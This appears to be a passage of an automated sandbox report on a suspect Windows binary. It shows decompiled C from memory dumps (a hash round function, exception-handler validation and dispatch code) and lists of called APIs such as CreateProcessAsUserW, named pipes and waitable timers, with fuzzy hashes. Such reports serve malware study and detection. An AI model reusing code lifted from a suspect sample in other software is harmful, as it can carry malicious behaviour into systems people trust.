                              				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                              				asm("rol ecx, 0xb");
                              				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                              				asm("rol edx, 0x10");
                              				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                              				_t598 = _t366 ^ _t425;
                              				asm("ror esi, 0x9");
                              				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                              				asm("rol eax, 0x4");
                              				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                              				asm("rol edi, 0xb");
                              				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                              				asm("rol edx, 0x10");
                              				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                              				_t337 = _t606 ^ _t427;
                              				asm("ror ecx, 0x9");
                              				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                              				asm("rol eax, 0x4");
                              				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                              				asm("rol esi, 0xb");
                              				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                              				asm("rol edi, 0x10");
                              				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                              				_t429 = _t733 ^ _t612;
                              				asm("ror ecx, 0x9");
                              				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                              				asm("rol eax, 0x4");
                              				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                              				asm("rol edx, 0xb");
                              				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                              				asm("rol esi, 0x10");
                              				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                              				asm("ror ecx, 0x9");
                              				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                              				asm("rol eax, 0x6");
                              				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                              				asm("rol edx, 0xa");
                              				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                              				asm("rol esi, 0xf");
                              				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                              				asm("ror ecx, 0xb");
                              				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                              				asm("rol eax, 0x6");
                              				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                              				asm("rol edx, 0xa");
                              				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                              				asm("rol esi, 0xf");
                              				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                              				asm("ror ecx, 0xb");
                              				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                              				asm("rol eax, 0x6");
                              				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                              				asm("rol edx, 0xa");
                              				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                              				asm("rol esi, 0xf");
                              				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                              				asm("ror edi, 0xb");
                              				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                              				asm("rol eax, 0x6");
                              				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                              				asm("rol edx, 0xa");
                              				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                              				_t399 = _a4;
                              				asm("rol esi, 0xf");
                              				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                              				 *_t399 =  *_t399 + _t259;
                              				asm("ror eax, 0xb");
                              				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                              				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                              				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                              				return memset( &_v76, 0, 0x40);
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                              • Instruction ID: b3adafc1e322788ef249501b883bb42551bb7e5f36a5aff09460e0c8f7c612a6
                              • Opcode Fuzzy Hash: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                              • Instruction Fuzzy Hash: 8E22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: efce550417713b946daaebcaa1dd037909378da6d3b0fa6eca907473515c9663
                              • Instruction ID: 0790e711aee4fd12e3fd6ad4c907a12abaa5998ce64920ecd221e36a0ac6366f
                              • Opcode Fuzzy Hash: efce550417713b946daaebcaa1dd037909378da6d3b0fa6eca907473515c9663
                              • Instruction Fuzzy Hash: 9A428D70A00B658FCB29CF69C4906AABBF1FF4D304F5889ADD4CB9B655D778A485CB00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,?,00000000,000000FE,00000000,?,00000000), ref: 01035764
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 5279c614074fadf263421e4d654e8b42e2ae18bcccd5cc66f58a76856bc56bed
                              • Instruction ID: e734b50a61f3a2c47063b56569a10628f94a215b6b91561fe82150b8b0f5c1ab
                              • Opcode Fuzzy Hash: 5279c614074fadf263421e4d654e8b42e2ae18bcccd5cc66f58a76856bc56bed
                              • Instruction Fuzzy Hash: 3E325771A00204DFEF59CF58C8807ADBBF6FF98310F248599D895AB296DB71DA41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013EB2A9(long _a4) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				signed int _v16;
                              				short* _v32;
                              				void _v36;
                              				void* _t57;
                              				signed int _t58;
                              				signed int _t61;
                              				signed int _t62;
                              				void* _t63;
                              				signed int* _t68;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr _t72;
                              				intOrPtr _t75;
                              				void* _t76;
                              				signed int _t77;
                              				void* _t78;
                              				void _t80;
                              				signed int _t81;
                              				signed int _t84;
                              				signed int _t86;
                              				short* _t87;
                              				void* _t89;
                              				signed int* _t90;
                              				long _t91;
                              				signed int _t93;
                              				signed int _t94;
                              				signed int _t100;
                              				signed int _t102;
                              				void* _t104;
                              				long _t108;
                              				signed int _t110;
                              
                              				_t108 = _a4;
                              				_t76 =  *(_t108 + 8);
                              				if((_t76 & 0x00000003) != 0) {
                              					L3:
                              					return 0;
                              				}
                              				_a4 =  *[fs:0x4];
                              				_v8 =  *[fs:0x8];
                              				if(_t76 < _v8 || _t76 >= _a4) {
                              					_t102 =  *(_t108 + 0xc);
                              					__eflags = _t102 - 0xffffffff;
                              					if(_t102 != 0xffffffff) {
                              						_t91 = 0;
                              						__eflags = 0;
                              						_a4 = 0;
                              						_t57 = _t76;
                              						do {
                              							_t80 =  *_t57;
                              							__eflags = _t80 - 0xffffffff;
                              							if(_t80 == 0xffffffff) {
                              								goto L9;
                              							}
                              							__eflags = _t80 - _t91;
                              							if(_t80 >= _t91) {
                              								L20:
                              								_t63 = 0;
                              								L60:
                              								return _t63;
                              							}
                              							L9:
                              							__eflags =  *(_t57 + 4);
                              							if( *(_t57 + 4) != 0) {
                              								_t12 =  &_a4;
                              								 *_t12 = _a4 + 1;
                              								__eflags =  *_t12;
                              							}
                              							_t91 = _t91 + 1;
                              							_t57 = _t57 + 0xc;
                              							__eflags = _t91 - _t102;
                              						} while (_t91 <= _t102);
                              						__eflags = _a4;
                              						if(_a4 == 0) {
                              							L15:
                              							_t81 =  *0x13ed310; // 0x0
                              							_t110 = _t76 & 0xfffff000;
                              							_t58 = 0;
                              							__eflags = _t81;
                              							if(_t81 <= 0) {
                              								L18:
                              								_t104 = _t102 | 0xffffffff;
                              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                              								__eflags = _t61;
                              								if(_t61 < 0) {
                              									_t62 = 0;
                              									__eflags = 0;
                              								} else {
                              									_t62 = _a4;
                              								}
                              								__eflags = _t62;
                              								if(_t62 == 0) {
                              									L59:
                              									_t63 = _t104;
                              									goto L60;
                              								} else {
                              									__eflags = _v12 - 0x1000000;
                              									if(_v12 != 0x1000000) {
                              										goto L59;
                              									}
                              									__eflags = _v16 & 0x000000cc;
                              									if((_v16 & 0x000000cc) == 0) {
                              										L46:
                              										_t63 = 1;
                              										 *0x13ed358 = 1;
                              										__eflags =  *0x13ed358;
                              										if( *0x13ed358 != 0) {
                              											goto L60;
                              										}
                              										_t84 =  *0x13ed310; // 0x0
                              										__eflags = _t84;
                              										_t93 = _t84;
                              										if(_t84 <= 0) {
                              											L51:
                              											__eflags = _t93;
                              											if(_t93 != 0) {
                              												L58:
                              												 *0x13ed358 = 0;
                              												goto L5;
                              											}
                              											_t77 = 0xf;
                              											__eflags = _t84 - _t77;
                              											if(_t84 <= _t77) {
                              												_t77 = _t84;
                              											}
                              											_t94 = 0;
                              											__eflags = _t77;
                              											if(_t77 < 0) {
                              												L56:
                              												__eflags = _t84 - 0x10;
                              												if(_t84 < 0x10) {
                              													_t86 = _t84 + 1;
                              													__eflags = _t86;
                              													 *0x13ed310 = _t86;
                              												}
                              												goto L58;
                              											} else {
                              												do {
                              													_t68 = 0x13ed318 + _t94 * 4;
                              													_t94 = _t94 + 1;
                              													__eflags = _t94 - _t77;
                              													 *_t68 = _t110;
                              													_t110 =  *_t68;
                              												} while (_t94 <= _t77);
                              												goto L56;
                              											}
                              										}
                              										_t69 = 0x13ed314 + _t84 * 4;
                              										while(1) {
                              											__eflags =  *_t69 - _t110;
                              											if( *_t69 == _t110) {
                              												goto L51;
                              											}
                              											_t93 = _t93 - 1;
                              											_t69 = _t69 - 4;
                              											__eflags = _t93;
                              											if(_t93 > 0) {
                              												continue;
                              											}
                              											goto L51;
                              										}
                              										goto L51;
                              									}
                              									_t87 = _v32;
                              									__eflags =  *_t87 - 0x5a4d;
                              									if( *_t87 != 0x5a4d) {
                              										goto L59;
                              									}
                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                              									__eflags =  *_t71 - 0x4550;
                              									if( *_t71 != 0x4550) {
                              										goto L59;
                              									}
                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                              										goto L59;
                              									}
                              									_t78 = _t76 - _t87;
                              									__eflags =  *((short*)(_t71 + 6));
                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                              									if( *((short*)(_t71 + 6)) <= 0) {
                              										goto L59;
                              									}
                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                              									__eflags = _t78 - _t72;
                              									if(_t78 < _t72) {
                              										goto L46;
                              									}
                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                              										goto L46;
                              									}
                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                              										goto L20;
                              									}
                              									goto L46;
                              								}
                              							} else {
                              								goto L16;
                              							}
                              							while(1) {
                              								L16:
                              								__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
                              								if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
                              									break;
                              								}
                              								_t58 = _t58 + 1;
                              								__eflags = _t58 - _t81;
                              								if(_t58 < _t81) {
                              									continue;
                              								}
                              								goto L18;
                              							}
                              							__eflags = _t58;
                              							if(_t58 <= 0) {
                              								goto L5;
                              							}
                              							 *0x13ed358 = 1;
                              							__eflags =  *0x13ed358;
                              							if( *0x13ed358 != 0) {
                              								goto L5;
                              							}
                              							__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
                              							if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
                              								L32:
                              								_t100 = 0;
                              								__eflags = _t58;
                              								if(_t58 < 0) {
                              									L34:
                              									 *0x13ed358 = 0;
                              									goto L5;
                              								} else {
                              									goto L33;
                              								}
                              								do {
                              									L33:
                              									_t90 = 0x13ed318 + _t100 * 4;
                              									_t100 = _t100 + 1;
                              									__eflags = _t100 - _t58;
                              									 *_t90 = _t110;
                              									_t110 =  *_t90;
                              								} while (_t100 <= _t58);
                              								goto L34;
                              							}
                              							_t25 = _t81 - 1; // -1
                              							_t58 = _t25;
                              							__eflags = _t58;
                              							if(_t58 < 0) {
                              								L28:
                              								__eflags = _t81 - 0x10;
                              								if(_t81 < 0x10) {
                              									_t81 = _t81 + 1;
                              									__eflags = _t81;
                              									 *0x13ed310 = _t81;
                              								}
                              								_t28 = _t81 - 1; // 0x0
                              								_t58 = _t28;
                              								goto L32;
                              							} else {
                              								goto L25;
                              							}
                              							while(1) {
                              								L25:
                              								__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
                              								if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
                              									break;
                              								}
                              								_t58 = _t58 - 1;
                              								__eflags = _t58;
                              								if(_t58 >= 0) {
                              									continue;
                              								}
                              								break;
                              							}
                              							__eflags = _t58;
                              							if(__eflags >= 0) {
                              								if(__eflags == 0) {
                              									goto L34;
                              								}
                              								goto L32;
                              							}
                              							goto L28;
                              						}
                              						_t75 =  *((intOrPtr*)(_t108 - 8));
                              						__eflags = _t75 - _v8;
                              						if(_t75 < _v8) {
                              							goto L20;
                              						}
                              						__eflags = _t75 - _t108;
                              						if(_t75 >= _t108) {
                              							goto L20;
                              						}
                              						goto L15;
                              					}
                              					L5:
                              					_t63 = 1;
                              					goto L60;
                              				} else {
                              					goto L3;
                              				}
                              			}

                              APIs
                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 013EB35A
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MemoryQueryVirtual
                              • String ID:
                              • API String ID: 2850889275-0
                              • Opcode ID: b3703ea83ab6615a86651c3d0d35c3705cb01ea774a80b7ec0716f22113dbc89
                              • Instruction ID: 0db4a34ce82c5b7c77c2c5d1e22d0af6125a92ad9565403452b9a06d3b4c207c
                              • Opcode Fuzzy Hash: b3703ea83ab6615a86651c3d0d35c3705cb01ea774a80b7ec0716f22113dbc89
                              • Instruction Fuzzy Hash: E461EE306007269BEB2BCE6DC488629B7E5EF8571CF288429D915DB6DEE730D841CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 1a8c8b71b26ba80787053b4dded8a9c99399c88f9419866838543e92f3df5ac7
                              • Instruction ID: 4e156d34183f36ecb8fe2c2ec19905c8a4c23bc9df08188a0acef10d3adb4682
                              • Opcode Fuzzy Hash: 1a8c8b71b26ba80787053b4dded8a9c99399c88f9419866838543e92f3df5ac7
                              • Instruction Fuzzy Hash: D0D15B71A0026ACBCB59CFA8C4905FEBBB1FFA4314F2481ADE99297241E7709A55CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01038AA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateProcessUser
                              • String ID:
                              • API String ID: 2217836671-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0102D061
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorStatus
                              • String ID:
                              • API String ID: 1596131371-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E013EB084(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                              				intOrPtr _v8;
                              				char _v12;
                              				void* __ebp;
                              				signed int* _t43;
                              				char _t44;
                              				void* _t46;
                              				void* _t49;
                              				intOrPtr* _t53;
                              				void* _t54;
                              				void* _t65;
                              				long _t66;
                              				signed int* _t80;
                              				signed int* _t82;
                              				void* _t84;
                              				signed int _t86;
                              				void* _t89;
                              				void* _t95;
                              				void* _t96;
                              				void* _t99;
                              				void* _t106;
                              
                              				_t43 = _t84;
                              				_t65 = __ebx + 2;
                              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                              				_t89 = _t95;
                              				_t96 = _t95 - 8;
                              				_push(_t65);
                              				_push(_t84);
                              				_push(_t89);
                              				asm("cld");
                              				_t66 = _a8;
                              				_t44 = _a4;
                              				if(( *(_t44 + 4) & 0x00000006) != 0) {
                              					_push(_t89);
                              					E013EB1EF(_t66 + 0x10, _t66, 0xffffffff);
                              					_t46 = 1;
                              				} else {
                              					_v12 = _t44;
                              					_v8 = _a12;
                              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                              					_t86 =  *(_t66 + 0xc);
                              					_t80 =  *(_t66 + 8);
                              					_t49 = E013EB2A9(_t66);
                              					_t99 = _t96 + 4;
                              					if(_t49 == 0) {
                              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                              						goto L11;
                              					} else {
                              						while(_t86 != 0xffffffff) {
                              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                              							if(_t53 == 0) {
                              								L8:
                              								_t80 =  *(_t66 + 8);
                              								_t86 = _t80[_t86 + _t86 * 2];
                              								continue;
                              							} else {
                              								_t54 =  *_t53();
                              								_t89 = _t89;
                              								_t86 = _t86;
                              								_t66 = _a8;
                              								_t55 = _t54;
                              								_t106 = _t54;
                              								if(_t106 == 0) {
                              									goto L8;
                              								} else {
                              									if(_t106 < 0) {
                              										_t46 = 0;
                              									} else {
                              										_t82 =  *(_t66 + 8);
                              										E013EB194(_t55, _t66);
                              										_t89 = _t66 + 0x10;
                              										E013EB1EF(_t89, _t66, 0);
                              										_t99 = _t99 + 0xc;
                              										E013EB28B(_t82[2]);
                              										 *(_t66 + 0xc) =  *_t82;
                              										_t66 = 0;
                              										_t86 = 0;
                              										 *(_t82[2])(1);
                              										goto L8;
                              									}
                              								}
                              							}
                              							goto L13;
                              						}
                              						L11:
                              						_t46 = 1;
                              					}
                              				}
                              				L13:
                              				return _t46;
                              			}

                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01028BF0: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01028C24
                                • Part of subcall function 01028BF0: GetLastError.KERNEL32(?), ref: 01028CE5
                                • Part of subcall function 01028BF0: ReleaseMutex.KERNEL32(00000000), ref: 01028CEE
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01047767
                                • Part of subcall function 0103D4BA: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                                • Part of subcall function 0103D4BA: CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                                • Part of subcall function 0103D4BA: GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 0103D4BA: GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                                • Part of subcall function 0103D4BA: SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                                • Part of subcall function 0103D4BA: HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 010477A6
                              • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 01047821
                              • StrTrimA.SHLWAPI(00000000,?), ref: 01047843
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 01047883
                              • WaitForMultipleObjects.KERNEL32(00008019,?,00000000,000000FF), ref: 0104791D
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047952
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047971
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 010479A2
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 010479BC
                              • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 01047A07
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 01047A21
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01047A37
                              • ReleaseMutex.KERNEL32(?), ref: 01047A54
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000), ref: 01047A75
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047A91
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047AA0
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01047AD4
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 01047AEE
                              • SwitchToThread.KERNEL32 ref: 01047AF0
                              • ReleaseMutex.KERNEL32(?), ref: 01047AFA
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047B38
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047B43
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01047B66
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 01047B80
                              • SwitchToThread.KERNEL32 ref: 01047B82
                              • ReleaseMutex.KERNEL32(?), ref: 01047B8C
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047BA1
                              • CloseHandle.KERNEL32(?), ref: 01047BEF
                              • CloseHandle.KERNEL32(?), ref: 01047C03
                              • CloseHandle.KERNEL32(?), ref: 01047C0F
                              • CloseHandle.KERNEL32(?), ref: 01047C1B
                              • CloseHandle.KERNEL32(?), ref: 01047C27
                              • CloseHandle.KERNEL32(?), ref: 01047C33
                              • CloseHandle.KERNEL32(?), ref: 01047C3F
                              • CloseHandle.KERNEL32(?), ref: 01047C4B
